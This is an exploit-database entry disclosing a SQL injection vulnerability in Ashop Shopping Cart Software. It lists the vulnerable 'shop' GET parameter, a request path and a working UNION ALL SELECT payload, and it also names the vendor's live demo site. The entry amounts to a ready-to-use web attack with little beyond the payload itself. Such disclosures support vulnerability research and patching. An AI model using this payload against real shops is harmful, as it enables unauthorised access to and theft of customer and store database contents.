Ashop Shopping Cart Software - SQL Injection Vulnerability

2019-04-03T00:00:00
ID 1337DAY-ID-32479
Type zdt
Reporter Ahmet Ümit BAYRAM
Modified 2019-04-03T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Ashop Shopping Cart Software - SQL Injection
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.ashopsoftware.com
# Software Link: https://sourceforge.net/projects/ashop/
# Demo Site: http://demo.ashopsoftware.com/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/index.php?cat=1&exp=&shop=1
Vulnerable Parameter: shop (GET)
Payload: cat=1&exp=&shop=-5438') UNION ALL SELECT
CONCAT(0x71786b6a71,0x6357557777645143654a726369774c4167665278634a46617758614d66506b46434f4b7669565054,0x716a787671),NULL--
fmIb

#  0day.today [2019-04-04]  #